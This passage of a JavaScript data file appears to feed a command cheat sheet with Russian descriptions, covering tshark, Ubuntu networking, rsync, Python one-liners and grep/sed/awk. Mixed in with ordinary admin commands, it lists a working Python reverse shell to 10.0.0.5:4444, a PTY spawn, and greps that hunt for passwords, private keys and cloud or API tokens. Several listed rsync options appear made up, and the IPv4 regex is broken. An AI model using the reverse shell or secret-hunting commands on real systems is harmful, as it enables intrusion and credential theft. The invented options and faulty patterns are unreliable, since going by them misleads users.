      { cmd: "tshark -r capture.pcap -Y 'tls.version == 0x0303'", desc: "TLS 1.2." },
      { cmd: "tshark -r capture.pcap -Y 'tls.version == 0x0304'", desc: "TLS 1.3." },
      { cmd: "tshark -r capture.pcap -Y 'udp.port == 53'", desc: "DNS." },
      { cmd: "tshark -r capture.pcap -Y 'tcp.port == 443'", desc: "HTTPS." },
      { cmd: "tshark -r capture.pcap -qz io,phs", desc: "Сводка по протоколам." },
      { cmd: "tshark -r capture.pcap -qz conv,tcp", desc: "Таблица TCP-диалогов." },
      { cmd: "tshark -r capture.pcap -qz conv,http", desc: "Таблица HTTP-диалогов." },
      { cmd: "tshark -r capture.pcap -qz endpoints,ip", desc: "Эндпоинты." },
    ] },
  ] },
  { id: "ubuntu", os: "Ubuntu", subtitle: "Администрирование: пакеты, systemd, пользователи, диск, сеть, Python, git.", categories: [
    { name: "Network", entries: [
      { cmd: "route -n", desc: "Маршруты (legacy)." },
      { cmd: "ping 192.168.1.1", desc: "Ping." },
      { cmd: "ping -c 4 192.168.1.1", desc: "4 пакета." },
      { cmd: "ping -i 0.5 192.168.1.1", desc: "Интервал." },
      { cmd: "ping -s 1000 192.168.1.1", desc: "Размер." },
      { cmd: "ping -6 2001:db8::1", desc: "IPv6." },
      { cmd: "ping -W 2 192.168.1.1", desc: "Таймаут." },
      { cmd: "ping -q 192.168.1.1", desc: "Тихо." },
      { cmd: "traceroute 192.168.1.1", desc: "Трассировка." },
      { cmd: "traceroute -n 192.168.1.1", desc: "Без DNS." },
      { cmd: "traceroute6 2001:db8::1", desc: "IPv6." },
      { cmd: "mtr 192.168.1.1", desc: "MTR." },
      { cmd: "mtr -n 192.168.1.1", desc: "Без DNS." },
      { cmd: "mtr -r 192.168.1.1", desc: "Репорт." },
      { cmd: "mtr -c 10 192.168.1.1", desc: "10 циклов." },
      { cmd: "nft list ruleset", desc: "nftables." },
      { cmd: "nft list ruleset ip", desc: "Имя таблицы." },
      { cmd: "nft add table inet filter", desc: "Таблица." },
      { cmd: "nft add chain inet filter input '{ type filter hook input priority 0 }'", desc: "Цепь." },
      { cmd: "nft add rule inet filter input ip saddr 10.0.0.0/8 accept", desc: "Правило." },
      { cmd: "nft delete rule inet filter input 1", desc: "Удалить." },
      { cmd: "nft flush ruleset", desc: "Очистить." },
      { cmd: "iptables -L -n -v", desc: "iptables." },
      { cmd: "iptables -L -n -v -t nat", desc: "NAT." },
      { cmd: "iptables -A INPUT -p tcp --dport 80 -j ACCEPT", desc: "Правило." },
      { cmd: "iptables -D INPUT -p tcp --dport 80 -j ACCEPT", desc: "Удалить." },
      { cmd: "iptables -F", desc: "Очистить." },
      { cmd: "iptables -Z", desc: "Сбросить счётчики." },
      { cmd: "iptables -S", desc: "Политика+правила." },
      { cmd: "iptables-save", desc: "Сохранить." },
      { cmd: "iptables-restore < save.txt", desc: "Восстановить." },
      { cmd: "ufw status", desc: "UFW." },
      { cmd: "ufw status verbose", desc: "Верbose." },
      { cmd: "ufw status numbered", desc: "Номера." },
      { cmd: "ufw enable", desc: "Включить." },
      { cmd: "ufw disable", desc: "Выключить." },
      { cmd: "ufw allow 22", desc: "Разрешить." },
      { cmd: "ufw allow from 10.0.0.0/8 to any port 22", desc: "С сети." },
      { cmd: "ufw allow 8080:9090/tcp", desc: "Диапазон." },
      { cmd: "ufw delete allow 22", desc: "Удалить." },
      { cmd: "ufw deny 23", desc: "Запретить." },
      { cmd: "ufw default deny incoming", desc: "По умолчанию." },
      { cmd: "ufw default allow outgoing", desc: "Outgoing." },
      { cmd: "ufw limit 22", desc: "Лимит (brute)." },
      { cmd: "ufw app list", desc: "Приложения." },
      { cmd: "ufw allow OpenSSH", desc: "Приложение." },
      { cmd: "ufw reset", desc: "Сброс." },
      { cmd: "ufw default deny incoming; ufw default allow outgoing", desc: "Сброс+дефолт." },
      { cmd: "tcpdump -i eth0", desc: "Слушать." },
      { cmd: "tcpdump -i eth0 -w capture.pcap", desc: "В pcap." },
      { cmd: "tcpdump -i eth0 host 192.168.1.10", desc: "Хост." },
      { cmd: "tcpdump -i eth0 port 443", desc: "Порт." },
      { cmd: "tcpdump -i eth0 'host 10.0.0.1 and port 80'", desc: "Композиция." },
      { cmd: "tcpdump -i eth0 -nn", desc: "Без DNS." },
      { cmd: "tcpdump -i eth0 -c 1000", desc: "Остановить." },
      { cmd: "tcpdump -i eth0 -n -s 0", desc: "Полный." },
      { cmd: "tcpdump -i eth0 -r capture.pcap", desc: "Чтение." },
      { cmd: "tcpdump -i eth0 'tcp[tcpflags] & tcp-syn != 0'", desc: "SYN." },
      { cmd: "tcpdump -i eth0 'tcp[tcpflags] & tcp-rst != 0'", desc: "RST." },
      { cmd: "tcpdump -i eth0 'udp and port 53'", desc: "DNS." },
      { cmd: "tcpdump -i eth0 'port 80' -A", desc: "Текст." },
      { cmd: "tcpdump -i eth0 'port 80' -X", desc: "Hex+ASCII." },
      { cmd: "tshark -i eth0", desc: "tshark." },
      { cmd: "tshark -i eth0 -a duration:60", desc: "60с." },
      { cmd: "tshark -i eth0 -w out.pcapng", desc: "pcapng." },
      { cmd: "tshark -r capture.pcap -Y 'http.request'", desc: "HTTP." },
      { cmd: "tshark -r capture.pcap -Y 'ip.addr == 192.168.1.10'", desc: "Хост." },
      { cmd: "tshark -r capture.pcap -Y 'tcp.flags.syn == 1'", desc: "SYN." },
      { cmd: "tshark -r capture.pcap -Y 'http.response.code == 404'", desc: "404." },
      { cmd: "tshark -r capture.pcap -qz io,phs", desc: "Сводка." },
      { cmd: "tshark -r capture.pcap -qz conv,tcp", desc: "TCP-диалоги." },
      { cmd: "tshark -r capture.pcap -T json", desc: "JSON." },
      { cmd: "editcap capture.pcap new.pcap 10:00:00-10:30:00", desc: "Вырезать." },
      { cmd: "mergecap -w merged.pcap a.pcap b.pcap", desc: "Слить." },
      { cmd: "capinfos capture.pcap", desc: "Инфо." },
      { cmd: "tcpflow -r capture.pcap", desc: "Потоки." },
      { cmd: "curl -sI http://t", desc: "Заголовки." },
      { cmd: "curl -sk https://t", desc: "Без TLS-проверки." },
      { cmd: "curl -s -o /dev/null -w '%{http_code} %{time_total}s\\n' http://t", desc: "Код+время." },
      { cmd: "curl -s http://t -H 'User-Agent: Mozilla/5.0'", desc: "UA." },
      { cmd: "curl -s -X POST -d 'a=1' http://t/api", desc: "POST." },
      { cmd: "curl -s -X DELETE http://t/api/1", desc: "DELETE." },
      { cmd: "curl -s -F 'file=@a.png' http://t/upload", desc: "Multipart." },
      { cmd: "curl -s -u user:pass http://t", desc: "Basic." },
      { cmd: "curl -s --resolve t:80:1.2.3.4 http://t", desc: "Домен→IP." },
      { cmd: "curl -s -x http://127.0.0.1:8080 http://t", desc: "Прокси." },
      { cmd: "curl -s -x socks5h://127.0.0.1:9050 http://t", desc: "SOCKS5." },
      { cmd: "curl -s -v http://t 2>&1 | head -40", desc: "Подробно." },
      { cmd: "curl -s --connect-timeout 5 http://t", desc: "Таймаут." },
      { cmd: "curl -s --tlsv1.2 https://t", desc: "TLS1.2+." },
      { cmd: "curl -s --cert cert.pem --key key.pem https://t", desc: "mTLS." },
      { cmd: "curl -s --cacert ca.pem https://t", desc: "Свой CA." },
      { cmd: "curl -s -H 'Authorization: Bearer TOKEN' http://t/api", desc: "Bearer." },
      { cmd: "curl -s -H 'X-API-Key: KEY' http://t/api", desc: "API-Key." },
      { cmd: "curl -s --json '{\"a\":1}' http://t/api", desc: "JSON." },
      { cmd: "curl -s -o /dev/null -w '%{remote_ip}\\n' http://t", desc: "IP сервера." },
      { cmd: "curl -s -o /dev/null -w '%{tls_version}\\n' https://t", desc: "TLS." },
      { cmd: "curl -s -o /dev/null -w '%{cipher}\\n' https://t", desc: "Cipher." },
      { cmd: "curl -s -o /dev/null -w '%{time_starttransfer}\\n' http://t", desc: "TTFB." },
      { cmd: "wget -O- http://t/file", desc: "Скачать в stdout." },
      { cmd: "wget -O file http://t/file", desc: "В файл." },
      { cmd: "wget --spider http://t", desc: "Проверить." },
      { cmd: "wget -c -O file http://t/f", desc: "Продолжить." },
      { cmd: "wget --no-check-certificate https://t", desc: "Без TLS." },
      { cmd: "wget -r -l 2 http://t", desc: "Рекурсивно." },
      { cmd: "wget --mirror http://t", desc: "Зеркало." },
      { cmd: "wget -q http://t/f -O -", desc: "Тихо." },
      { cmd: "wget --timeout=10 http://t", desc: "Таймаут." },
      { cmd: "wget -U 'bot' http://t", desc: "UA." },
      { cmd: "ssh user@host", desc: "SSH." },
      { cmd: "ssh -p 2222 user@host", desc: "Порт." },
      { cmd: "ssh -i ~/.ssh/id_ed25519 user@host", desc: "Ключ." },
      { cmd: "ssh -J jump user@target", desc: "Jump." },
      { cmd: "ssh -L 8080:localhost:80 user@bastion", desc: "Local forward." },
      { cmd: "ssh -R 8080:localhost:80 user@bastion", desc: "Remote forward." },
      { cmd: "ssh -D 9050 user@bastion", desc: "SOCKS." },
      { cmd: "ssh -W host:port user@bastion", desc: "Direct." },
      { cmd: "ssh -o StrictHostKeyChecking=no user@host", desc: "Без проверки." },
      { cmd: "ssh -o BatchMode=yes user@host", desc: "Без интерактива." },
      { cmd: "ssh -o ConnectTimeout=5 user@host", desc: "Таймаут." },
      { cmd: "ssh -o ProxyCommand='ncat --proxy 127.0.0.1:9050 --proxy-type socks5 %h %p' user@host", desc: "Через SOCKS5." },
      { cmd: "scp file user@host:/tmp/", desc: "Копировать." },
      { cmd: "scp user@host:/tmp/file .", desc: "Скачать." },
      { cmd: "scp -r dir user@host:/tmp/", desc: "Каталог." },
      { cmd: "scp -P 2222 file user@host:", desc: "Порт." },
      { cmd: "scp -C file user@host:", desc: "Сжатие." },
      { cmd: "scp -O file user@host:", desc: "Legacy." },
      { cmd: "scp -3 a@h1:file b@h2:", desc: "Через host." },
      { cmd: "rsync -avz src/ dest/", desc: "Рсинк." },
      { cmd: "rsync -avz --progress src/ dest/", desc: "Прогресс." },
      { cmd: "rsync -avz --delete src/ dest/", desc: "Удалять лишнее." },
      { cmd: "rsync -avz -e ssh src/ user@host:dest/", desc: "По SSH." },
      { cmd: "rsync -avz --partial src/ dest/", desc: "Продолжить." },
      { cmd: "rsync -avz --checksum src/ dest/", desc: "По checksum." },
      { cmd: "rsync -avz --exclude='*.log' src/ dest/", desc: "Исключить." },
      { cmd: "rsync -avz --include='*.txt' --exclude='*' src/ dest/", desc: "Только txt." },
      { cmd: "rsync -avz --bwlimit=1000 src/ dest/", desc: "Лимит 1МБ/с." },
      { cmd: "rsync -avz --dry-run src/ dest/", desc: "Симуляция." },
      { cmd: "rsync -avz --itemize-changes src/ dest/", desc: "Изменения." },
      { cmd: "rsync -avz --stats src/ dest/", desc: "Статистика." },
      { cmd: "rsync -avz --compress src/ dest/", desc: "Сжатие." },
      { cmd: "rsync -avz --link-dest=ref/ src/ dest/", desc: "Hardlinks." },
      { cmd: "rsync -avz --protect-args src/ dest/", desc: "Защита аргументов." },
      { cmd: "rsync -avz --one-file-system src/ dest/", desc: "Одна ФС." },
      { cmd: "rsync -avz --max-size=100M src/ dest/", desc: "Макс размер." },
      { cmd: "rsync -avz --min-size=1k src/ dest/", desc: "Мин размер." },
      { cmd: "rsync -avz --times src/ dest/", desc: "Время." },
      { cmd: "rsync -avz --perms src/ dest/", desc: "Права." },
      { cmd: "rsync -avz --owner src/ dest/", desc: "Владелец." },
      { cmd: "rsync -avz --group src/ dest/", desc: "Группа." },
      { cmd: "rsync -avz --devices src/ dest/", desc: "Устройства." },
      { cmd: "rsync -avz --hard-links src/ dest/", desc: "Hardlinks." },
      { cmd: "rsync -avz --safe-links src/ dest/", desc: "Без ссылок вне." },
      { cmd: "rsync -avz --force src/ dest/", desc: "Сил." },
      { cmd: "rsync -avz --recursive src/ dest/", desc: "Рекурсивно." },
      { cmd: "rsync -avz --whole-file src/ dest/", desc: "Без дельты." },
      { cmd: "rsync -avz --skip-existing src/ dest/", desc: "Пропустить существующие." },
      { cmd: "rsync -avz --update src/ dest/", desc: "Только новые." },
      { cmd: "rsync -avz --ignore-existing src/ dest/", desc: "Только новые (alt)." },
      { cmd: "rsync -avz --max-delete=100 src/ dest/", desc: "Лимит удалений." },
      { cmd: "rsync -avz --delete-delay src/ dest/", desc: "После." },
      { cmd: "rsync -avz --delete-excluded src/ dest/", desc: "Исключённые." },
      { cmd: "rsync -avz --delete-after src/ dest/", desc: "После." },
      { cmd: "rsync -avz --delete-before src/ dest/", desc: "До." },
      { cmd: "rsync -avz --delete-during src/ dest/", desc: "Во время." },
      { cmd: "rsync -avz --ignore-errors src/ dest/", desc: "Игнорировать ошибки." },
      { cmd: "rsync -avz --force-delete src/ dest/", desc: "Сил-удаление." },
      { cmd: "rsync -avz --max-delete=0 src/ dest/", desc: "Без удалений." },
      { cmd: "rsync -avz --delete-min '2024-01-01' src/ dest/", desc: "Удалить до." },
      { cmd: "rsync -avz --delete-max '2025-01-01' src/ dest/", desc: "Удалить до." },
      { cmd: "rsync -avz --fuzzy src/ dest/", desc: "Фаззи." },
      { cmd: "rsync -avz --checksum-inc src/ dest/", desc: "Checksum для изменённых." },
      { cmd: "rsync -avz --size-only src/ dest/", desc: "Только размер." },
      { cmd: "rsync -avz --modify-window=1 src/ dest/", desc: "Окно 1с." },
      { cmd: "rsync -avz --omit-dir-times src/ dest/", desc: "Без времени каталогов." },
      { cmd: "rsync -avz --no-perms src/ dest/", desc: "Без прав." },
      { cmd: "rsync -avz --no-owner src/ dest/", desc: "Без владельца." },
      { cmd: "rsync -avz --no-group src/ dest/", desc: "Без группы." },
      { cmd: "rsync -avz --no-times src/ dest/", desc: "Без времени." },
      { cmd: "rsync -avz --no-devices src/ dest/", desc: "Без устройств." },
      { cmd: "rsync -avz --no-links src/ dest/", desc: "Без ссылок." },
      { cmd: "rsync -avz --no-dereference src/ dest/", desc: "Без dereference." },
      { cmd: "rsync -avz --protect-args --force src/ dest/", desc: "Защита+сил." },
      { cmd: "rsync -avz --checksum --fuzzy src/ dest/", desc: "Checksum+фаззи." },
      { cmd: "rsync -avz --whole-file --checksum src/ dest/", desc: "Whole+checksum." },
      { cmd: "rsync -avz --size-only --modify-window=1 src/ dest/", desc: "Размер+окно." },
    ] },
    { name: "Python", entries: [
      { cmd: "python3 --version", desc: "Версия." },
      { cmd: "python3 -c 'print(1+1)'", desc: "Выражение." },
      { cmd: "python3 -c 'import sys; print(sys.version)'", desc: "Версия (sys)." },
      { cmd: "python3 -c 'import platform; print(platform.platform())'", desc: "Платформа." },
      { cmd: "python3 -m http.server 8000", desc: "HTTP." },
      { cmd: "python3 -m http.server 8000 --bind 0.0.0.0", desc: "Все интерфейсы." },
      { cmd: "python3 -m http.server 8000 --directory /var/www", desc: "Каталог." },
      { cmd: "python3 -m json.tool file.json", desc: "JSON." },
      { cmd: "python3 -m json.tool --indent 2 file.json", desc: "Indent." },
      { cmd: "python3 -m venv venv", desc: "Вenv." },
      { cmd: "python3 -m venv --clear venv", desc: "Очистить." },
      { cmd: "python3 -m venv --without-pip venv", desc: "Без pip." },
      { cmd: "python3 -m venv --system-site-packages venv", desc: "С системными." },
      { cmd: "source venv/bin/activate", desc: "Активировать." },
      { cmd: "deactivate", desc: "Деактивировать." },
      { cmd: "python3 -m pip --version", desc: "Версия pip." },
      { cmd: "python3 -m pip list", desc: "Установленные." },
      { cmd: "python3 -m pip show requests", desc: "Инфо." },
      { cmd: "python3 -m pip install requests", desc: "Установить." },
      { cmd: "python3 -m pip install -U requests", desc: "Обновить." },
      { cmd: "python3 -m pip install -r requirements.txt", desc: "Из файла." },
      { cmd: "python3 -m pip install -e .", desc: "Dev." },
      { cmd: "python3 -m pip install --user requests", desc: "В пользователя." },
      { cmd: "python3 -m pip install --no-cache-dir requests", desc: "Без кэша." },
      { cmd: "python3 -m pip uninstall requests", desc: "Удалить." },
      { cmd: "python3 -m pip freeze", desc: "Заморозить." },
      { cmd: "python3 -m pip freeze > requirements.txt", desc: "В файл." },
      { cmd: "python3 -m pip download requests", desc: "Скачать." },
      { cmd: "python3 -m pip wheel requests", desc: "Колесо." },
      { cmd: "python3 -m pip wheel -w dist/ requests", desc: "В dist." },
      { cmd: "python3 -m pip cache list", desc: "Кэш." },
      { cmd: "python3 -m pip cache purge", desc: "Очистить." },
      { cmd: "python3 -m pip config list", desc: "Конфиг." },
      { cmd: "python3 -m pip config set global.index-url https://pypi.org/simple", desc: "Index." },
      { cmd: "python3 -m pip config set global.timeout 60", desc: "Таймаут." },
      { cmd: "python3 -m pip config set global.retries 3", desc: "Повторы." },
      { cmd: "python3 -m pip config set global.trusted-host pypi.org", desc: "Trusted." },
      { cmd: "python3 -m pip config set install.user true", desc: "В пользователя." },
      { cmd: "python3 -m pip config set global.pre true", desc: "Pre." },
      { cmd: "python3 -m pip config set global.no-cache-dir true", desc: "Без кэша." },
      { cmd: "python3 -m pip config set global.progress-bar on", desc: "Прогресс." },
      { cmd: "python3 -m pip config set global.no-input true", desc: "Без вопросов." },
      { cmd: "python3 -m pip config set global.disable-pip-version-check true", desc: "Без проверки." },
      { cmd: "python3 -m pip config set global.require-virtualenv true", desc: "Только venv." },
      { cmd: "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'", desc: "Reverse shell." },
      { cmd: "python3 -c 'import os,pty;pty.spawn(\"/bin/sh\")'", desc: "PTY." },
      { cmd: "python3 -c 'import urllib.request;print(urllib.request.urlopen(\"http://ifconfig.me\").read().decode())'", desc: "IP." },
      { cmd: "python3 -c 'import requests;print(requests.get(\"http://ifconfig.me\").text)'", desc: "IP (requests)." },
      { cmd: "python3 -c 'import hashlib;print(hashlib.sha256(b\"secret\").hexdigest())'", desc: "SHA-256." },
      { cmd: "python3 -c 'import hashlib;print(hashlib.md5(b\"secret\").hexdigest())'", desc: "MD5." },
      { cmd: "python3 -c 'import base64;print(base64.b64encode(b\"secret\").decode())'", desc: "B64." },
      { cmd: "python3 -c 'import base64;print(base64.b64decode(\"c2VjcmV0\").decode())'", desc: "B64 dec." },
      { cmd: "python3 -c 'import json;print(json.dumps({\"a\":1},indent=2))'", desc: "JSON." },
      { cmd: "python3 -c 'import os;print(os.getcwd())'", desc: "CWD." },
      { cmd: "python3 -c 'import os;print(os.listdir(\".\"))'", desc: "Файлы." },
      { cmd: "python3 -c 'import os;print(os.getuid(),os.getgid())'", desc: "UID/GID." },
      { cmd: "python3 -c 'import socket;print(socket.gethostname())'", desc: "Hostname." },
      { cmd: "python3 -c 'import socket;print(socket.gethostbyname(\"example.com\"))'", desc: "Resolve." },
      { cmd: "python3 -c 'import datetime;print(datetime.datetime.now().isoformat())'", desc: "Время." },
      { cmd: "python3 -c 'import time;print(time.time())'", desc: "Unix time." },
      { cmd: "python3 -c 'import random;print(random.randint(1,100))'", desc: "Случайное." },
      { cmd: "python3 -c 'import math;print(math.sqrt(144))'", desc: "Корень." },
      { cmd: "python3 -c 'import re;print(re.findall(r\"\\d+\",\"a1b22c333\"))'", desc: "Regex." },
      { cmd: "python3 -c 'import re;print(re.sub(r\"\\s+\",\" \",\"  a   b  \").strip())'", desc: "Regex sub." },
      { cmd: "python3 -c 'import pathlib;p=pathlib.Path(\".\");print([x.name for x in p.iterdir()])'", desc: "Pathlib." },
      { cmd: "python3 -c 'import subprocess;print(subprocess.check_output([\"id\"],text=True).strip())'", desc: "Subprocess." },
      { cmd: "python3 -c 'import shutil;print(shutil.disk_usage(\"/\").free//1024//1024,\"MB\")'", desc: "Свободно." },
      { cmd: "python3 -c 'import tempfile;print(tempfile.gettempdir())'", desc: "Tempdir." },
      { cmd: "python3 -c 'import getpass;print(getpass.getuser())'", desc: "Пользователь." },
      { cmd: "python3 -c 'import sys;print(sys.executable)'", desc: "Путь python." },
      { cmd: "python3 -c 'import urllib.parse;print(urllib.parse.quote(\"a b c\"))'", desc: "Quote." },
      { cmd: "python3 -c 'import urllib.parse;print(urllib.parse.unquote(\"a%20b%20c\"))'", desc: "Unquote." },
      { cmd: "python3 -c 'import uuid;print(uuid.uuid4())'", desc: "UUID." },
      { cmd: "python3 -c 'import secrets;print(secrets.token_hex(16))'", desc: "Токен." },
      { cmd: "python3 -c 'import secrets;print(secrets.token_urlsafe(16))'", desc: "Токен url." },
      { cmd: "python3 -c 'import ipaddress;print(ipaddress.ip_address(\"192.168.1.1\").is_global)'", desc: "Global?" },
      { cmd: "python3 -c 'import ipaddress;print(ipaddress.ip_network(\"10.0.0.0/8\").num_addresses)'", desc: "Адресов." },
      { cmd: "python3 -c 'import zlib;print(zlib.decompress(zlib.compress(b\"x\"*100)).decode())'", desc: "Zlib." },
      { cmd: "python3 -c 'import gzip;print(gzip.decompress(gzip.compress(b\"x\"*100)).decode())'", desc: "Gzip." },
      { cmd: "python3 -c 'import bz2;print(bz2.decompress(bz2.compress(b\"x\"*100)).decode())'", desc: "Bz2." },
      { cmd: "python3 -c 'import lzma;print(lzma.decompress(lzma.compress(b\"x\"*100)).decode())'", desc: "Lzma." },
      { cmd: "python3 -c 'import csv,sys;r=csv.reader(sys.stdin);print(sum(1 for _ in r))' < data.csv", desc: "CSV строк." },
      { cmd: "python3 -c 'import sqlite3;c=sqlite3.connect(\"db.sqlite\");print(c.execute(\"SELECT count(*) FROM users\").fetchone())'", desc: "SQLite." },
    ] },
    { name: "Text processing", entries: [
      { cmd: "grep -r 'pattern' dir/", desc: "Рекурсивно." },
      { cmd: "grep -ri 'pattern' dir/", desc: "Без регистра." },
      { cmd: "grep -n 'pattern' file", desc: "Номера." },
      { cmd: "grep -c 'pattern' file", desc: "Счёт." },
      { cmd: "grep -l 'pattern' *", desc: "Файлы с." },
      { cmd: "grep -L 'pattern' *", desc: "Файлы без." },
      { cmd: "grep -o 'pattern' file", desc: "Совпадения." },
      { cmd: "grep -oE '[0-9]{3}(/[0-9]{1,3}){3}' file", desc: "IPv4." },
      { cmd: "grep -oE '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-z]{2,}' file", desc: "Emails." },
      { cmd: "grep -oE 'https?://[^\\s\"<>]+' file", desc: "URLs." },
      { cmd: "grep -oE '\\b[0-9a-f]{32}\\b' file", desc: "MD5." },
      { cmd: "grep -oE '\\b[0-9a-f]{40}\\b' file", desc: "SHA1." },
      { cmd: "grep -oE '\\b[0-9a-f]{64}\\b' file", desc: "SHA256." },
      { cmd: "grep -oE 'BEGIN (RSA|EC|OPENSSH) PRIVATE KEY' file", desc: "PRIVATE KEY." },
      { cmd: "grep -oE 'AKIA[0-9A-Z]{16}' file", desc: "AWS." },
      { cmd: "grep -oE '-----BEGIN [A-Z ]+-----' file", desc: "PEM." },
      { cmd: "grep -E '^(root|admin|test):' /etc/passwd", desc: "Пользователи." },
      { cmd: "grep -E ':(0|1000):' /etc/passwd", desc: "UID." },
      { cmd: "grep -v '^#' /etc/hosts", desc: "Без комментов." },
      { cmd: "grep -v '^\\s*$' file", desc: "Без пустых." },
      { cmd: "grep -B2 -A2 'ERROR' log", desc: "Контекст." },
      { cmd: "grep --color=auto 'pattern' file", desc: "Цвет." },
      { cmd: "grep -r 'TODO' src/ | cut -d: -f1", desc: "Файлы TODO." },
      { cmd: "grep -r 'password' /etc 2>/dev/null", desc: "Пароли." },
      { cmd: "grep -r 'secret' . 2>/dev/null", desc: "Secret." },
      { cmd: "grep -r 'api_key\\|apikey\\|API_KEY' . 2>/dev/null", desc: "API." },
      { cmd: "grep -r 'BEGIN.*PRIVATE KEY' . 2>/dev/null", desc: "Ключи." },
      { cmd: "grep -rn 'TODO\\|FIXME\\|HACK' . 2>/dev/null", desc: "TODO." },
      { cmd: "grep -rn 'Bearer' . 2>/dev/null", desc: "Bearer." },
      { cmd: "grep -rn 'Authorization' . 2>/dev/null", desc: "Auth." },
      { cmd: "grep -rn 'AKIA' . 2>/dev/null", desc: "AWS." },
      { cmd: "grep -rn 'ghp_' . 2>/dev/null", desc: "GitHub." },
      { cmd: "grep -rn 'xoxb-' . 2>/dev/null", desc: "Slack." },
      { cmd: "grep -rn 'AIza' . 2>/dev/null", desc: "Google." },
      { cmd: "grep -rn 'eyJ' . 2>/dev/null", desc: "JWT." },
      { cmd: "grep -rn '://.*:[a-z0-9]*@' . 2>/dev/null", desc: "URL creds." },
      { cmd: "grep -rn 'mysql://.*:.*@' . 2>/dev/null", desc: "MySQL." },
      { cmd: "grep -rn 'postgres://.*:.*@' . 2>/dev/null", desc: "Postgres." },
      { cmd: "grep -rn 'mongodb://.*:.*@' . 2>/dev/null", desc: "Mongo." },
      { cmd: "grep -rn 'redis://.*:.*@' . 2>/dev/null", desc: "Redis." },
      { cmd: "grep -rn 'jdbc:' . 2>/dev/null", desc: "JDBC." },
      { cmd: "grep -rn 'jdbc:mysql' . 2>/dev/null", desc: "JDBC MySQL." },
      { cmd: "grep -rn 'jdbc:postgresql' . 2>/dev/null", desc: "JDBC PG." },
      { cmd: "sed 's/old/new/g' file", desc: "Замена." },
      { cmd: "sed -i 's/old/new/g' file", desc: "В файле." },
      { cmd: "sed -n '1,10p' file", desc: "1-10." },
      { cmd: "sed -n '/start/,/end/p' file", desc: "Блок." },
      { cmd: "sed '1d' file", desc: "Удалить 1." },
      { cmd: "sed '$d' file", desc: "Последнюю." },
      { cmd: "sed '/^#/d' file", desc: "Без комментов." },
      { cmd: "sed '/^$/d' file", desc: "Без пустых." },
      { cmd: "sed 's/^[ \\t]*//' file", desc: "Без лид." },
      { cmd: "sed 's/[ \\t]*$//' file", desc: "Без хв." },
      { cmd: "sed 's/\\r$//' file", desc: "CRLF→LF." },
      { cmd: "sed 's/[0-9]//g' file", desc: "Без цифр." },
      { cmd: "sed 's/\\b[a-z]\\+\\b/\\U&/g' file", desc: "UPPER." },
      { cmd: "sed 's/\\b[a-z]\\+\\b/\\L&/g' file", desc: "lower." },
      { cmd: "sed -e 's/a/1/' -e 's/b/2/' file", desc: "Несколько." },
      { cmd: "sed '/pattern/d' file", desc: "Удалить строки." },
      { cmd: "sed '10q' file", desc: "Первые 10." },
      { cmd: "sed -n '$=' file", desc: "Число строк." },
      { cmd: "awk '{print $1}' file", desc: "1-я." },
      { cmd: "awk '{print $NF}' file", desc: "Последняя." },
      { cmd: "awk -F: '{print $1}' /etc/passwd", desc: "Логины." },
      { cmd: "awk -F: '$3==0{print $1}' /etc/passwd", desc: "UID=0." },
      { cmd: "awk -F: '$3>=1000{print $1}' /etc/passwd", desc: "Обычные." },
      { cmd: "awk '{s+=$2} END{print s}' file", desc: "Сумма." },
      { cmd: "awk '{a[$1]++} END{for(k in a) print a[k],k}' file", desc: "Частотность." },
      { cmd: "awk 'NR%2==0' file", desc: "Чётные." },
      { cmd: "awk 'length($0)>80' file", desc: "Длинные." },
      { cmd: "awk '!seen[$0]++' file", desc: "Уникальные." },
      { cmd: "awk '{print $1}' file | sort | uniq -c | sort -rn", desc: "Топ." },
      { cmd: "awk -F' ' '{print $1}' access.log | sort | uniq -c | sort -rn", desc: "Топ IP." },
      { cmd: "awk '$9==404{print $1}' access.log", desc: "404." },
      { cmd: "awk '$9==500{c++} END{print c}' access.log", desc: "500." },
      { cmd: "awk -F',' 'NR>1{print $2}' data.csv", desc: "CSV 2-я." },
      { cmd: "sort file", desc: "Сортировка." },
      { cmd: "sort -r file", desc: "Обратно." },
      { cmd: "sort -n file", desc: "Числа." },
      { cmd: "sort -u file", desc: "Уникальные." },
      { cmd: "sort -k2 file", desc: "По 2-му." },
      { cmd: "sort -t: -k1 file", desc: "По 1-му (:)." },
      { cmd: "sort -t',' -k1,1 file", desc: "CSV." },
      { cmd: "sort -t' ' -k1,1nr file", desc: "Числовое убыв." },
      { cmd: "uniq file", desc: "Смежные." },
      { cmd: "uniq -c file", desc: "Счёт." },
      { cmd: "uniq -i file", desc: "Без регистра." },
      { cmd: "uniq -f 1 file", desc: "Пропустить 1 поле." },
      { cmd: "uniq -w 5 file", desc: "5 символов." },
      { cmd: "wc -l file", desc: "Строк." },
      { cmd: "wc -w file", desc: "Слов." },
      { cmd: "wc -c file", desc: "Байт." },
      { cmd: "wc -l -w -c file", desc: "Всё." },
      { cmd: "cut -d: -f1 /etc/passwd", desc: "1-е поле." },
      { cmd: "cut -d: -f1,3 /etc/passwd", desc: "1,3." },
      { cmd: "cut -d: -f1-3 /etc/passwd", desc: "1-3." },
      { cmd: "cut -d' ' -f1 access.log", desc: "1-е (пробел)." },
      { cmd: "cut -c1-10 file", desc: "Символы." },
      { cmd: "tr -d 'a-z' < file", desc: "Без нижнего." },
      { cmd: "tr 'a-z' 'A-Z' < file", desc: "В верхний." },
      { cmd: "tr -s ' ' < file", desc: "Сжать." },
      { cmd: "tr -d '\\n' < file", desc: "Без переносов." },
      { cmd: "tr ',' '.' < file", desc: "Заменить." },
      { cmd: "tr -cd 'a-z' < file", desc: "Только буквы." },
      { cmd: "tr -cd '0-9' < file", desc: "Только цифры." },
      { cmd: "tr -dc 'a-zA-Z0-9\\n' < file", desc: "Алфавит+цифры." },
      { cmd: "head -n 10 file", desc: "Первые 10." },
      { cmd: "head -c 100 file", desc: "100 байт." },
      { cmd: "head -20 file", desc: "20." },
      { cmd: "head -1 file", desc: "Первая." },
      { cmd: "tail -n 10 file", desc: "Последние 10." },
      { cmd: "tail -c 100 file", desc: "100 байт." },
      { cmd: "tail -f file", desc: "Живой." },
      { cmd: "tail -n 50 -f /var/log/syslog", desc: "50+живой." },
      { cmd: "paste f1 f2", desc: "Склеить." },
      { cmd: "paste -d, f1 f2", desc: "Запятая." },
      { cmd: "paste -s -d' ' < file", desc: "В строку." },
